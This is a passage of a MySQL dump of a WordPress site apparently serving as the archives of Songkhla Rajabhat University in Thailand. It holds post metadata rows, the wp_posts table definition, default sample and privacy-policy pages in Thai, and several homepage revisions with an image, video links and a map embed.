(1320, 532, '_edit_lock', '1558920508:1'),
(1323, 534, '_edit_last', '1'),
(1324, 534, '_edit_lock', '1558920686:1'),
(1327, 536, '_edit_last', '1'),
(1328, 536, '_edit_lock', '1558920680:1'),
(1331, 538, '_edit_last', '1'),
(1332, 538, '_edit_lock', '1558920672:1'),
(1335, 540, '_edit_last', '1'),
(1336, 540, '_edit_lock', '1558920662:1'),
(1339, 542, '_edit_last', '1'),
(1340, 542, '_edit_lock', '1558920656:1'),
(1343, 544, '_edit_last', '1'),
(1344, 544, '_edit_lock', '1558920646:1'),
(1347, 546, '_edit_last', '1'),
(1348, 546, '_edit_lock', '1558920635:1'),
(1357, 40, '_wp_trash_meta_status', 'publish'),
(1358, 40, '_wp_trash_meta_time', '1558920994'),
(1359, 40, '_wp_desired_post_slug', '%e0%b8%9c%e0%b8%a8-%e0%b8%94%e0%b8%a3-%e0%b8%99%e0%b8%b4%e0%b8%a7%e0%b8%b1%e0%b8%95-%e0%b8%81%e0%b8%a5%e0%b8%b4%e0%b9%88%e0%b8%99%e0%b8%87%e0%b8%b2%e0%b8%a1'),
(1360, 62, '_wp_trash_meta_status', 'publish'),
(1361, 62, '_wp_trash_meta_time', '1558920994'),
(1362, 62, '_wp_desired_post_slug', '%e0%b8%a3%e0%b8%a8-%e0%b8%94%e0%b8%a3-%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3-%e0%b9%82%e0%b8%aa%e0%b8%95%e0%b8%96%e0%b8%b4%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b8%b8%e0%b9%8c'),
(1363, 551, '_edit_last', '1'),
(1364, 551, '_edit_lock', '1558921110:1'),
(1367, 553, '_edit_last', '1'),
(1368, 553, '_edit_lock', '1558921126:1'),
(1371, 555, '_edit_last', '1'),
(1372, 555, '_edit_lock', '1558921146:1'),
(1375, 557, '_edit_last', '1'),
(1376, 557, '_edit_lock', '1558921160:1'),
(1379, 559, '_edit_last', '1'),
(1380, 559, '_edit_lock', '1558921173:1'),
(1383, 561, '_edit_last', '1'),
(1384, 561, '_edit_lock', '1558921190:1'),
(1387, 563, '_edit_last', '1'),
(1388, 563, '_edit_lock', '1558921203:1'),
(1391, 565, '_edit_last', '1'),
(1392, 565, '_edit_lock', '1558921217:1'),
(1395, 567, '_edit_last', '1'),
(1396, 567, '_edit_lock', '1558921232:1'),
(1399, 569, '_edit_last', '1'),
(1400, 569, '_edit_lock', '1558921248:1'),
(1403, 571, '_edit_last', '1'),
(1404, 571, '_edit_lock', '1558921261:1'),
(1407, 573, '_edit_last', '1'),
(1408, 573, '_edit_lock', '1558921273:1'),
(1411, 575, '_edit_last', '1'),
(1412, 575, '_edit_lock', '1558921294:1'),
(1415, 577, '_edit_last', '1'),
(1416, 577, '_edit_lock', '1558921309:1'),
(1419, 579, '_edit_last', '1'),
(1420, 579, '_edit_lock', '1558921323:1'),
(1423, 581, '_edit_last', '1'),
(1424, 581, '_edit_lock', '1558921337:1'),
(1427, 583, '_edit_last', '1'),
(1428, 583, '_edit_lock', '1558921350:1'),
(1431, 585, '_edit_last', '1'),
(1432, 585, '_edit_lock', '1558921365:1'),
(1435, 587, '_edit_last', '1'),
(1436, 587, '_edit_lock', '1558921379:1'),
(1439, 589, '_edit_last', '1'),
(1440, 589, '_edit_lock', '1558921393:1'),
(1443, 591, '_edit_last', '1'),
(1444, 591, '_edit_lock', '1558921407:1'),
(1447, 593, '_edit_last', '1'),
(1448, 593, '_edit_lock', '1558921421:1'),
(1451, 595, '_edit_last', '1'),
(1452, 595, '_edit_lock', '1558921436:1'),
(1455, 597, '_edit_last', '1'),
(1456, 597, '_edit_lock', '1558921448:1'),
(1459, 599, '_edit_last', '1'),
(1460, 599, '_edit_lock', '1558921464:1'),
(1463, 601, '_edit_last', '1'),
(1464, 601, '_edit_lock', '1558921480:1'),
(1469, 604, '_edit_last', '1'),
(1470, 604, '_wp_page_template', 'default'),
(1471, 604, '_edit_lock', '1558922846:1'),
(1472, 607, '_menu_item_type', 'post_type'),
(1473, 607, '_menu_item_menu_item_parent', '0'),
(1474, 607, '_menu_item_object_id', '604'),
(1475, 607, '_menu_item_object', 'page'),
(1476, 607, '_menu_item_target', ''),
(1477, 607, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1478, 607, '_menu_item_xfn', ''),
(1479, 607, '_menu_item_url', ''),
(1481, 17, '_wp_trash_meta_status', 'publish'),
(1482, 17, '_wp_trash_meta_time', '1558922256'),
(1483, 17, '_wp_desired_post_slug', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a1%e0%b8%ab%e0%b8%b2%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%a0'),
(1484, 17, '_wp_trash_meta_comments_status', 'a:1:{i:2;s:1:"0";}'),
(1485, 608, '_edit_last', '1'),
(1486, 608, '_edit_lock', '1558922840:1'),
(1487, 608, '_wp_page_template', 'default'),
(1488, 611, '_menu_item_type', 'post_type'),
(1489, 611, '_menu_item_menu_item_parent', '0'),
(1490, 611, '_menu_item_object_id', '608'),
(1491, 611, '_menu_item_object', 'page'),
(1492, 611, '_menu_item_target', ''),
(1493, 611, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1494, 611, '_menu_item_xfn', ''),
(1495, 611, '_menu_item_url', ''),
(1497, 612, '_edit_last', '1'),
(1498, 612, '_edit_lock', '1558922848:1'),
(1499, 612, '_wp_page_template', 'default'),
(1500, 3, '_edit_lock', '1558922842:1'),
(1501, 65, '_wp_trash_meta_status', 'publish'),
(1502, 65, '_wp_trash_meta_time', '1558923009'),
(1503, 65, '_wp_desired_post_slug', '%e0%b8%aa%e0%b8%b1%e0%b8%8d%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%93%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%a1%e0%b8%ab%e0%b8%b2%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2'),
(1504, 82, '_wp_trash_meta_status', 'publish'),
(1505, 82, '_wp_trash_meta_time', '1558923022'),
(1506, 82, '_wp_desired_post_slug', '%e0%b8%94%e0%b8%ad%e0%b8%81%e0%b9%84%e0%b8%a1%e0%b9%89%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%a1%e0%b8%ab'),
(1507, 614, '_menu_item_type', 'post_type'),
(1508, 614, '_menu_item_menu_item_parent', '0'),
(1509, 614, '_menu_item_object_id', '612'),
(1510, 614, '_menu_item_object', 'page'),
(1511, 614, '_menu_item_target', ''),
(1512, 614, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1513, 614, '_menu_item_xfn', ''),
(1514, 614, '_menu_item_url', ''),
(1516, 615, '_edit_last', '1'),
(1517, 615, '_edit_lock', '1558924271:1'),
(1520, 89, '_wp_trash_meta_status', 'publish'),
(1521, 89, '_wp_trash_meta_time', '1558924203'),
(1522, 89, '_wp_desired_post_slug', '%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2%e0%b8%88%e0%b8%b1%e0%b8%9a%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%a1-%e0%b8%89%e0%b8%87%e0%b8%8a%e0%b8%b4%e0%b9%88%e0%b8%87'),
(1523, 86, '_wp_trash_meta_status', 'publish'),
(1524, 86, '_wp_trash_meta_time', '1558924203'),
(1525, 86, '_wp_desired_post_slug', '%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%88%e0%b8%b1%e0%b8%a2-%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2-%e0%b9%83%e0%b8%8a%e0%b9%89%e0%b9%82%e0%b8%a1'),
(1526, 618, '_edit_last', '1'),
(1529, 618, '_edit_lock', '1558924279:1'),
(1534, 624, '_edit_last', '1'),
(1535, 624, '_edit_lock', '1558924287:1'),
(1544, 628, '_edit_last', '1'),
(1545, 628, '_edit_lock', '1558924342:1'),
(1548, 630, '_edit_last', '1'),
(1551, 630, '_edit_lock', '1558924400:1'),
(1552, 633, '_edit_last', '1'),
(1555, 633, '_edit_lock', '1558924432:1'),
(1556, 635, '_edit_last', '1'),
(1559, 635, '_edit_lock', '1558924466:1'),
(1560, 637, '_edit_last', '1'),
(1563, 637, '_edit_lock', '1558924493:1'),
(1564, 639, '_edit_last', '1'),
(1567, 639, '_edit_lock', '1558924531:1'),
(1568, 641, '_edit_last', '1'),
(1571, 641, '_edit_lock', '1558924555:1'),
(1572, 643, '_edit_last', '1'),
(1575, 643, '_edit_lock', '1558924704:1'),
(1576, 645, '_edit_last', '1'),
(1577, 645, '_edit_lock', '1558927253:1'),
(1579, 647, '_wp_attached_file', '2019/05/ปาริฉัตร-ปีที่7-ฉบับที่3-1.pdf');

-- --------------------------------------------------------

--
-- Table structure for table `wp_posts`
--

CREATE TABLE IF NOT EXISTS `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8_general_ci NOT NULL,
  `post_title` text COLLATE utf8_general_ci NOT NULL,
  `post_excerpt` text COLLATE utf8_general_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8_general_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8_general_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8_general_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8_general_ci NOT NULL,
  `pinged` text COLLATE utf8_general_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8_general_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) COLLATE utf8_general_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=InnoDB AUTO_INCREMENT=651 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wp_posts`
--

INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1, 1, '2019-05-26 01:45:01', '2019-05-26 01:45:01', '<!-- wp:paragraph -->\n<p>ยินดีต้อนรับสู่ WordPress นี่คือเรื่องแรกของคุณ แก้ไขหรือลบทิ้ง แล้วเริ่มการเขียนเลย!</p>\n<!-- /wp:paragraph -->', 'สวัสดีชาวโลก - -''', '', 'publish', 'open', 'open', '', 'hello-world', '', '', '2019-05-26 01:45:01', '2019-05-26 01:45:01', '', 0, 'http://172.17.40.11/wp511/?p=1', 0, 'post', '', 1),
(2, 1, '2019-05-26 01:45:01', '2019-05-26 01:45:01', '<!-- wp:paragraph -->\n<p>นี่คือหน้าตัวอย่าง มันแตกต่างจากเรื่องของบล็อกเพราะว่ามันจะอยู่ในที่เดียวและจะแสดงในการนำทางเว็บของคุณ (ในธีมส่วนใหญ่) หลายคนเริ่มด้วยหน้าเกี่ยวกับซึ่งแนะนำพวกเราสู่ผู้เยี่ยมชมเว็บ อาจจะพูดบางสิ่งประมาณนี้:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class="wp-block-quote"><p>สวัสดี! ฉันเป็นพนักงานส่งของในตอนกลางวัน ปรารถนาเป็นนักแสดงในตอนกลางคืน และนี่คือเว็บของฉัน ฉันอาศัยอยู่ที่ลอสแองเจลิส มีสุนัขที่ยอดเยี่ยมชื่อแจ๊ค และฉันชื่นชอบพีน่า โคลาด้า (และกำลังติดฝนอยู่)</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>...หรือบางสิ่งคล้ายกันนี้:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class="wp-block-quote"><p>บริษัทของเด็กเล่น XYZ ก่อตั้งในปี 1971 และได้จัดจำหน่ายของเด็กเล่นที่มีคุณภาพสู่สาธารณะตั้งแต่นั้นมา ตั้งอยู่ที่เมืองกอร์ทเทม บริษัทจ้างงานกว่า 2,000 คนและได้ทำสิ่งที่ดีเลิศมากมายสำหรับชุมชนเมืองกอร์ทเทม</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>ในฐานะผู้ใช้ WordPress ใหม่ คุณควรจะไปที่ <a href="http://172.17.40.11/wp511/wp-admin/">หน้าควบคุมของคุณ</a> เพื่อลบหน้านี้ และสร้างหน้าใหม่สำหรับเนื้อหาของคุณ สนุกกัน!</p>\n<!-- /wp:paragraph -->', 'หน้าตัวอย่าง', '', 'publish', 'closed', 'open', '', 'sample-page', '', '', '2019-05-26 01:45:01', '2019-05-26 01:45:01', '', 0, 'http://172.17.40.11/wp511/?page_id=2', 0, 'page', '', 0),
(3, 1, '2019-05-26 01:45:01', '2019-05-26 01:45:01', '<!-- wp:heading --><h2>เราคือใคร</h2><!-- /wp:heading --><!-- wp:paragraph --><p>ที่อยู่เว็บไซต์ของเราคือ: http://172.17.40.11/wp511</p><!-- /wp:paragraph --><!-- wp:heading --><h2>เราเก็บข้อมูลส่วนตัวอะไรบ้างและทำไมเราต้องเก็บ</h2><!-- /wp:heading --><!-- wp:heading {"level":3} --><h3>ความเห็น</h3><!-- /wp:heading --><!-- wp:paragraph --><p>เมื่อผู้เยี่ยมชมแสดงความเห็นในเว็บไซต์ เราเก็บข้อมูลที่แสดงในฟอร์มแสดงความเห็น และหมายเลขไอพีและเบราว์เซอร์ของผู้เยี่ยมชมด้วยเพื่อช่วยการตรวจสอบสแปม</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>สตริงนิรนามถูกสร้างขึ้นจากอีเมลของคุณ (หรือที่เรียกว่าแฮช) อาจจะถูกส่งให้บริการ Gravatar เพื่อดูว่าคุณใช้งานหรือไม่ นโยบายความเป็นส่วนตัวของบริการ Gravatar สามารถดูได้ที่นี่: https://automattic.com/privacy/ หลังจากได้รับการยืนยันความเห็นของคุณ รูปภาพข้อมูลส่วนตัวของคุณจะปรากฏสู่สาธารณะในบริบทของความเห็นของคุณ</p><!-- /wp:paragraph --><!-- wp:heading {"level":3} --><h3>สื่อ</h3><!-- /wp:heading --><!-- wp:paragraph --><p>ถ้าคุณอัปโหลดรูปภาพขึ้นมายังเว็บไซต์ คุณควรจะหลีกเลี่ยงการอัปโหลดรูปภาพที่มีข้อมูลตำแหน่งที่ตั้งฝังมาด้วย (EXIF GPS) ผู้เยี่ยมชมเว็บไซต์สามารถดาวน์โหลดและดึงข้อมูลตำแหน่งที่ตั้งใด ๆ จากรูปภาพบนเว็บไซต์ได้</p><!-- /wp:paragraph --><!-- wp:heading {"level":3} --><h3>แบบฟอร์มติดต่อ</h3><!-- /wp:heading --><!-- wp:heading {"level":3} --><h3>คุกกี้</h3><!-- /wp:heading --><!-- wp:paragraph --><p>ถ้าคุณแสดงความเห็นบนเว็บไซต์ของเรา คุณอาจจะเลือกเข้าสู่การบันทึกชื่อ อีเมลและเว็บไซต์ของคุณในคุกกี้ นี่จะเป็นการอำนวยความสะดวกสำหรับคุณโดยที่คุณไม่ต้องกรอกรายละเอียดเหล่านี้ซ้ำอีกครั้งในขณะที่คุณแสดงความเห็นอื่น คุกกี้นี้จะอยู่เป็นระยะเวลาหนึ่งปี</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>ถ้าคุณมีบัญชีและคุณเข้าสู่ระบบในเว็บไซต์นี้ คุณจะตั้งคุกกี้ชั่วคราวเพื่อตรวจสอบว่าเบราว์เซอร์ยอมรับคุกกี้ได้ คุกกี้นี้ไม่มีข้อมูลส่วนตัวรวมอยู่ด้วยและถูกยกเลิกเมื่อคุณปิดเบราว์เซอรของคุณ</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>เมื่อคุณเข้าสู่ระบบ เราจะจัดตั้งหลายคุกกี้เพื่อที่จะบันทึกข้อมูลการเข้าสู่ระบบของคุณและตัวเลือกการแสดงผลหน้าจอของคุณ คุกกี้การเข้าสู่ระบบจะคงอยู่ภายในสองวัน และคุกกี้ตัวเลือกหน้าจอจะอยู่เป็นเวลาหนึ่งปี ถ้าคุณเลือก &quot;บันทึกการใช้งานของฉัน&quot; การเข้าสู่ระบบของคุณจะยังคงอยู่เป็นเวลาสองสัปดาห์ ถ้าคุณออกจากระบบบัญชีของคุณ คุกกี้การเข้าสู่ระบบจะถูกลบทิ้ง</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>ถ้าคุณแก้ไขหรือเผยแพร่บทความ คุกกี้ที่เพิ่มเติมจะถูกบันทึกไว้ในเบราว์เซอร์ของคุณ คุกกี้นี้ไม่มีข้อมูลส่วนตัวรวมอยู่และชี้ไปที่ ID ของเรื่องบทความที่คุณเพิ่งจะแก้ไข ซึ่งจะหมดอายุใน 1 วัน</p><!-- /wp:paragraph --><!-- wp:heading {"level":3} --><h3>แนบเนื้อหาจากเว็บไซต์อื่น</h3><!-- /wp:heading --><!-- wp:paragraph --><p>บทความบนเว็บไซต์นี้อาจจะมีเนื้อหาที่ถูกแนบไว้ (เช่น วีดีโอ รูปภาพ บทความ เป็นต้น) เนื้อหาที่ถูกแนบไว้จากเว็บไซต์อื่นปฏิบัติในแนวทางเดียวกันกับที่ผู้เยี่ยมชมได้เข้าชมเว็บไซต์อื่น</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>เว็บไซต์เหล่านี้อาจจะมีการเก็บข้อมูลของคุณ ใช้คุกกี้ การฝังการติดตามบุคคลที่สามเพิ่มเติม และเฝ้าดูการปฏิสัมพันธ์กับเนื้อหาที่แนบไว้ รวมถึงการติดตามการปฏิสัมพันธ์ของคุณกับเนื้อหาที่ถูกแนบไว้ถ้าคุณมีบัญชีและเข้าสู่ระบบในเว็บไซต์นั้นไว้</p><!-- /wp:paragraph --><!-- wp:heading {"level":3} --><h3>การวิเคราะห์</h3><!-- /wp:heading --><!-- wp:heading --><h2>ใครที่เราแชร์ข้อมูลของคุณด้วย</h2><!-- /wp:heading --><!-- wp:heading --><h2>เราเก็บรักษาข้อมูลของคุณไว้นานแค่ไหน</h2><!-- /wp:heading --><!-- wp:paragraph --><p>ถ้าคุณแสดงความเห็น ความเห็นและข้อมูลภายในนั้นจะถูกเก็บไว้ตลอด นี่คือสิ่งที่เราสามารถจดจำและพิสูจน์ความเห็นที่ตามมาอย่างอัตโนมัติแทนที่จะต้องชะงักไว้ในคิวการจัดการ</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>สำหรับผู้ใช้ที่ลงทะเบียนบนเว็บไซต์ของเรา (ถ้ามี) เรามีการเก็บข้อมูลส่วนตัวตามที่พวกเขาให้ไว้ในโปรไฟล์เช่นกัน ผู้ใช้ทั้งหมดสามารถดู แก้ไข หรือลบข้อมูลส่วนตัวเมื่อใดก็ได้ (ยกเว้นพวกเขาไม่สามารถเปลี่ยนชื่อผู้ใช้ได้) ผู้ดูแลเว็บไซต์สามารถเห็นและแก้ไขข้อมูลเหล่านั้นได้เช่นกัน</p><!-- /wp:paragraph --><!-- wp:heading --><h2>คุณมีสิทธิ์อะไรบ้างกับข้อมูลของคุณ</h2><!-- /wp:heading --><!-- wp:paragraph --><p>ถ้าคุณมีบัญชีบนเว็บไซต์นี้ หรือได้แสดงความเห็น คุณสามารถร้องขอไฟล์ส่งออกของข้อมูลส่วนตัวที่เราเก็บไว้เกี่ยวกับคุณได้ รวมถึงข้อมูลใด ๆ ที่คุณได้ให้ไว้กับเรา คุณสามารถร้องรอให้เราลบข้อมูลส่วนตัวต่าง ๆ ที่เราเก็บไว้เกี่ยวกับคุณได้เช่นกัน นี่ไม่รวมถึงข้อมูลใด ๆ ที่เราจำเป็นต้องเก็บสำหรับการจัดการ ข้อกฎหมาย หรือวัตถุประสงค์ด้านความปลอดภัย</p><!-- /wp:paragraph --><!-- wp:heading --><h2>เราส่งข้อมูลของคุณไปที่ใด</h2><!-- /wp:heading --><!-- wp:paragraph --><p>ความเห็นของผู้เยี่ยมชมอาจถูกตรวจสอบผ่านบริการตรวจสอบสแปมอัตโนมัติ</p><!-- /wp:paragraph --><!-- wp:heading --><h2>ข้อมูลสำหรับติดต่อของคุณ</h2><!-- /wp:heading --><!-- wp:heading --><h2>ข้อมูลเพิ่มเติม</h2><!-- /wp:heading --><!-- wp:heading {"level":3} --><h3>เราปกป้องข้อมูลของคุณอย่างไร</h3><!-- /wp:heading --><!-- wp:heading {"level":3} --><h3>กระบวนการช่องโหว่ข้อมูลอะไรบ้างที่เรามีในที่นี้</h3><!-- /wp:heading --><!-- wp:heading {"level":3} --><h3>บุคคลที่สามอะไรบ้างที่เราได้รับข้อมูลมา</h3><!-- /wp:heading --><!-- wp:heading {"level":3} --><h3>มีการตัดสินใจและ/หรือการเก็บข้อมูลอย่างอัตโนมัติอะไรบ้างที่เราทำกับข้อมูลผู้ใช้</h3><!-- /wp:heading --><!-- wp:heading {"level":3} --><h3>ความต้องการการเปิดเผยซึ่งควบคุมบังคับในอุตสาหกรรม</h3><!-- /wp:heading -->', 'นโยบายความเป็นส่วนตัว', '', 'draft', 'closed', 'open', '', 'นโยบาย-ความเป็นส่วนตัว', '', '', '2019-05-26 01:45:01', '2019-05-26 01:45:01', '', 0, 'http://172.17.40.11/wp511/?page_id=3', 0, 'page', '', 0),
(4, 1, '2019-05-26 01:45:14', '0000-00-00 00:00:00', '', 'บันทึกฉบับร่างอัตโนมัติ', '', 'auto-draft', 'open', 'open', '', '', '', '', '2019-05-26 01:45:14', '0000-00-00 00:00:00', '', 0, 'http://172.17.40.11/wp511/?p=4', 0, 'post', '', 0),
(5, 1, '2019-05-26 09:12:47', '2019-05-26 02:12:47', 'บันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="aligncenter wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a>\r\n\r\n&nbsp;\r\n\r\nhttps://www.youtube.com/watch?v=y22195UuDTg', 'จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา', '', 'publish', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b9%81%e0%b8%a3%e0%b8%81', '', '', '2019-05-26 14:38:12', '2019-05-26 07:38:12', '', 0, 'http://172.17.40.11/wp511/?page_id=5', 0, 'page', '', 0),
(6, 1, '2019-05-26 08:56:12', '2019-05-26 01:56:12', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา', 'หน้าแรก', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 08:56:12', '2019-05-26 01:56:12', '', 5, 'http://172.17.40.11/wp511/5-revision-v1/', 0, 'revision', '', 0),
(7, 1, '2019-05-26 08:59:28', '2019-05-26 01:59:28', '', 'skru', '', 'inherit', 'open', 'closed', '', 'skru', '', '', '2019-05-26 08:59:28', '2019-05-26 01:59:28', '', 5, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru.jpg', 0, 'attachment', 'image/jpeg', 0),
(8, 1, '2019-05-26 08:59:38', '2019-05-26 01:59:38', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />', 'หน้าแรก', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 08:59:38', '2019-05-26 01:59:38', '', 5, 'http://172.17.40.11/wp511/5-revision-v1/', 0, 'revision', '', 0),
(9, 1, '2019-05-26 09:02:19', '2019-05-26 02:02:19', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://youtu.be/0uxQkIus27A', 'หน้าแรก', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 09:02:19', '2019-05-26 02:02:19', '', 5, 'http://172.17.40.11/wp511/5-revision-v1/', 0, 'revision', '', 0),
(10, 1, '2019-05-26 09:06:51', '2019-05-26 02:06:51', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://youtu.be/0uxQkIus27A\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', 'หน้าแรก', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 09:06:51', '2019-05-26 02:06:51', '', 5, 'http://172.17.40.11/wp511/5-revision-v1/', 0, 'revision', '', 0),
